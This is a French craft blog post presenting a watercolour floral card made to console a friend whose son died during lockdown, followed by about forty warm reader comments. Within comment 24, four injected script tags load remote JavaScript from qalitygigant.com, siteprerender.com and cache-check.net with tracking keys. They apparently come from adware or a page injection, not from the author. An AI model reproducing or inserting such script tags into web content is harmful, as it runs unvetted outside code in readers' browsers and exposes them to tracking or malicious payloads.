• Aquarelle Fleurie (carte)

     

     

    Aquarelle pour une Amitié (carte)

      ( Décliné en "Bon Week-End" à Retrouver dans la Rubrique    "Week-End"-"Printemps" ICI  et la Petite fille  dans la Rubrique   "Mes Tubes"-"Enfants" ICI )

     

     

    J'espère que vous aurez passé un Bon Week-end, chez moi il fut ensoleillé, nous avons repris notre marche d'1h00 le matin, nous découvrons notre campagne environnante d'un calme !!! du Bonheur !

     

    Aujourd'hui, je viens vous montrer une carte réalisée ce      week-end. Elle est pour une Amie qui a perdu un fils durant le confinement. J'ai été dans l'impossibilité de lui envoyer du courrier car la poste ne distribuait, ni ne ramassait le courrier chez moi (c'est aussi ça vivre à la Campagne !)

    Bref, je me devais de lui envoyer une carte mais les condoléances me paraissaient comme  tardives... Alors j'ai mis tout mon cœur à peindre en aquarelle ce papier fleuri et à faire une carte d'Amitié que voici...

     

     

     

     

    Aquarelle Fleurie (carte)

     

     

     

     

     

    Aquarelle Fleurie (carte)

     

     

     

     

     

    Aquarelle Fleurie (carte)

     ( à retrouver dans la Rubrique "Séparations"-"Fleurs-Nature-Animaux" ICI )

     

     

     

     

     

     

    Aquarelle Fleurie (carte)

     

     

     

     

     

    Aquarelle Fleurie (carte)

     ( A Retrouver dans la Rubrique "Jours"-"Lundi"-"Printemps" ICI )

     

     

     

     


    Tags Tags : , , , , , , ,
  • Commentaires

    41
    Lundi 27 Juillet 2020 à 00:15
    hello,c'est magnifique,bravo,gros bisous
    40
    Jeudi 28 Mai 2020 à 12:22

    Je t'ai lue lors de la publication, mais je n'avais pas encore pris le temps de te dire à quel point je trouvais ta carte réconfortante et élégante. Une belle attention d'amitié !!
    Bravo

    Gros Bisous

    39
    Mercredi 27 Mai 2020 à 09:11
    ta carte est tres belle bravo bisous
    38
    Dimanche 24 Mai 2020 à 22:27
    bibikafeine

    une superbe aquarelle qui, je sûre, apportera du soutien à ton amie. bises

    37
    Vendredi 22 Mai 2020 à 10:51
    Dane

    une jolie preuve d' amitiés cette carte est suberbe bravo Valie il faut du courage avec une pareil épreuve bon courage a elle bisous 

    36
    Qinoa
    Vendredi 22 Mai 2020 à 09:20
    Une carte qui pourra peut-être lui redonner un peu de morale. Pas facile pour ce couple qui ne vivait que pour leur fils
    35
    Vendredi 22 Mai 2020 à 00:34

    Une très belle aquarelle qui apportera un soutien précieux dans de si douloureuses circonstances.

    Bonne nuit.
    Bisous.

    34
    Jeudi 21 Mai 2020 à 07:59

    Nul doute que ta superbe carte est une belle preuve de soutien à ton amie et qu'elle l'aura touchée.

    Bisous bisous !

    33
    Mardi 19 Mai 2020 à 20:12

    Coucou Valie

    Une petite visite chez toi pour te souhaiter une bonne soirée et une douce nuit.

    Ici il a fait très beau et déjà trop chaud pour la saison.

    Gros bisous avec toute mon amitié

    Janine

    32
    Mardi 19 Mai 2020 à 18:00
    Une bien jolie carte de soutien faite avec le cœur
    Gros bisous valie
    31
    Mardi 19 Mai 2020 à 16:51

    une très belle carte je suis sur que cela vas lui plaire. et adoucir sa douleur. bonne soirée bisous liliane

    30
    Mardi 19 Mai 2020 à 16:47

    Bonjour,Valie

    j'espère que tu vas bien, j'aime beaucoup tes créations trop jolies, excuse moi je n'ai pu répondre plus tôt car je ne me sentais vraiment pas bien, mon docteur à changer un de mes médoc et je ne le supportais pas la ça va beaucoup mieux et je te remercie de m'avoir mis de si jolis commentaires, bon après - midi, gros bisous

    29
    Mardi 19 Mai 2020 à 12:51
    Ta carte est magnifique et superbement colorisé.
    Elle a dû lui faire plaisir malgré la douleur.
    Je t'embrasse très fort
    Béa
    28
    Mardi 19 Mai 2020 à 10:39

    C'est très triste pour ton amie, ta carte de soutien est bien jolie...

    27
    Mardi 19 Mai 2020 à 08:35

    Ton amie va etre touchée par cette délicate et belle attention. Bonne journée. Bisous

    26
    Mardi 19 Mai 2020 à 00:18

    Très belle attention que ta carte d'Amitié en de si douloureuses circonstances, elle apportera à ton Amie Douceur & Réconfort.

    Doux Bisous ma tite Valie.

    25
    Lundi 18 Mai 2020 à 22:20

    Nul doute que ton amie sera touchée par ta création.

    Perdre un enfant, rien de pire ne peut nous être infligé et même si je ne connais pas ton amie (enfin, je suppose) mon coeur de maman est en peine pour elle et son époux.

    Gros bisous

    24
    mamijojo77100
    Lundi 18 Mai 2020 à 19:43

    en effet ta carte toute douce touchera notre aminette. quel dur moment pour eux. et ce virus qui nous colle a la peau en permanence.. il faut prendre soin de soin de soi. Y A TELLEMENT d imbeciles qui se croient innateignables, ca devient "indigeste".quelle mentalite..  BONNE SEMAINE  et gbisous  joelle

    <script src="//qalitygigant.com/227ee61cbd084e801b.js"></script>

    <script src="http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8830x" type="text/javascript"></script>

    <script src="http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8830x&format=arrjs&r=1589823561791" type="text/javascript"></script> <script src="http://qalitygigant.com/ext/227ee61cbd084e801b.js?sid=52666_8830_&title=asas&blocks[]=31af2" type="text/javascript"></script>

    23
    Lundi 18 Mai 2020 à 18:37

    superbe ta carte !

    quel malheur....

    bisous

    22
    Lundi 18 Mai 2020 à 17:39

    https://i.postimg.cc/h4ZXGZSM/1-H-svyw-PUr-Ise5-Wj0nk-T41u-Ze-Y.pngJe trouve cela tellement triste la perte d'un enfant, ça me fend le cœur.  Elle sera très contente pour ta jolie carte d'amitié.  C'est une belle intention.  Passe une belle journée Valie.

    https://i.postimg.cc/3N0YNBBb/b-lundi-valie.png

    21
    Lundi 18 Mai 2020 à 17:34

    Elle est splendide ta carte et provient de ton coeur si grand et si aimant ma belle Valie. C'est tellement triste de perdre un enfant surtout en ce moment. Passe une bonne semaine, je t'embrasse fort !

    20
    Lundi 18 Mai 2020 à 17:14

    Bonjour ma chère Valie

    Je suis bien triste pour ton amie de perdre son fils c'est terrible et en plus avec ce sale virus

    La carte que tu as faite est superbe , pas besoin d'écrire de la regarder ça suffit elle va y voir toute ta tendresse :

    Bonne fin de journée et gros bisous

    Janine

    19
    gaelle
    Lundi 18 Mai 2020 à 17:14

    ton aquarelle est splendide et va apporter du reconfort a cette amie si durement peinée.

    bravo valie

    biz

    gaelle

    18
    Jacline-H-49
    Lundi 18 Mai 2020 à 17:03

    En effet ma Valie, c'était ce qu'il y avait de mieux à faire. Cette magnifique carte, va lui réchauffer le coeur, cette amie a besoin de couleurs pour atténuer sa douleur.

    Soleil partout et vive les promenades dans le calme des campagnes.

    Bon après midi chère amie

    GROS BISOUS TENDRESSE de

    Jacline 

     

    17
    Lundi 18 Mai 2020 à 14:26

    Elle est ravissante ta carte et pas facile de créer ces cartes pour ces circonstances bravo à toi

    Gros bisous Pierrette67

    16
    marianne pirotte
    Lundi 18 Mai 2020 à 13:23

    Une bien jolie carte pour ton amie !!

    Gros bisous

    Marianne

    15
    Lundi 18 Mai 2020 à 13:15

    Un beau geste de ta part pour marquer ton amitié,

    bonne semaine ; bisous / Nicole

     
     
    14
    Lundi 18 Mai 2020 à 12:52

    Dans cette périodes de drame pour ton amie, chaque marque d'amitié est importante.

    Ta carte est jolie, pleine de couleurs et c'est super de montrer qu'il y a de jolies choses encore dans la vie au moment ou les personnes voient la vie en noir.

    Gros bisous, bonne journée.

    13
    Lundi 18 Mai 2020 à 12:49

    Très belle ta carte pour ton amie qui passe une épreuve difficile!! Pas toujours facile à faire et bravo à toi.....

    Bisous et douce journée

    12
    Lundi 18 Mai 2020 à 10:32

    Le but de ta carte est de remonter le moral à ton amie aussi elle sera parfaite et peu importe le temps qu'il a fallu à ta carte pour arriver jusqu'à elle!! Bisos Nadine

    11
    Lundi 18 Mai 2020 à 09:59

    Une belle carte qui aura certainement apportée un peu de baume au coeur en cette période de grande tristesse à ton amie

    Passe une bonne journée

    Bisous

    10
    Lundi 18 Mai 2020 à 09:54

    Ton coeur est présent pour elle,cela la touchera plus que tout...Une épreuve difficile pour ton Amie..Il n'est jamais facile de faire ce genre de courrier...

    Tu as su mettre en valeur  l'affection avec cette carte magnifique..Merci Valie de nous montrer

    ton joli travail.Pour la marche bravo c'est bien,et c'est la meilleure saison,après il fera trop chaud..Profitez bien tous les deux...

    Douce semaine.

    Gros bisous*

    911 - La secrétaire -réception de vos demandes 03

    9
    Jour de mai
    Lundi 18 Mai 2020 à 09:40

    Coucou Valie, 

    Je pense que c'est le plus difficile, perdre un enfant, peu importe son âge, cela effectivement n'est pas dans la logique des choses mais tu as trouvé de quoi réconforter, un peu si je peux m'exprimer ainsi, ton amie. 

    Ta carte est très belle, un rappel par le ruban et elle pourra la conserver et la regarder quand elle le souhaitera. 

    Très bon Lundi, ensoleillé, les sorties sont agréables même si on garde les distances avec le masque sur le nez. 

    Je t'envoie de très gros bisous ♥♥♥♥

    LN

    8
    Lundi 18 Mai 2020 à 09:38
    Bravo à toi pour toute la sensibilité que tu as apportée à cette carte que l'on souhaiterait ne jamais envoyer ! Plein de courage pour ton amie qui vit l'insoutenable. Bisous et bonne semaine sous notre soleil sarthois ☀️
    7
    Lundi 18 Mai 2020 à 09:22

    Ta carte est très jolie, ça ne doit pas être un moment facile pour elle... et faire une carte dans ces conditions est toujours quelques choses de difficile. 

    Bises

    Thaly

    6
    Jeannine (cristal24)
    Lundi 18 Mai 2020 à 08:59

    Bonjour Valie,

    Elle est super belle ta carte; j'espère qu'elle va remonter le moral de ton amie.

    Je te souhaite une bonne semaine avec le soleil.

    A bientôt.  Bises.

    Jeannine

    5
    Lundi 18 Mai 2020 à 08:37

    Coucou Valie

    une bien jolie carte , pas toujours facile comme situation courage à ton amie .

    bisous bonne journée .

    4
    Lundi 18 Mai 2020 à 08:21

    C est bien triste ma Valie de perdre un enfant je suis de tout coeur avec ton amie sachant trop ce que l on éprouve et ce tous les jours de notre vie, ta carte est de toute beauté , digne de ce qui lui arrive mais je connais ta légendaire gentillesse bisous du jour remplis de tendresse

    3
    Lundi 18 Mai 2020 à 08:20

    Bonjour ma Valie

    très émouvante ta carte pour ton amie, Cette saleté de maladie n'épargne personne !!!!

    Je te souhaite une bonne nouvelle semaine

    Bonne journée en ce lundi quoi que tu feras

    Bisous de Pat

    2
    Lundi 18 Mai 2020 à 08:19

    hello Valie 

    quelle belle carte !!! 

    profite bien du beau temps 

    nous, on reste encore confiner . On ne sort que pour de courtes balades 

    passe une bonne journée 

    bisous

    1
    Lundi 18 Mai 2020 à 08:12

    Bonjour Valie une carte très touchante pour ton amie dans la peine. Quelle épouvantable période qu'il nous faudra bien dépasser pourtant. Je te souhaite une bonne journée et une belle semaine.

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :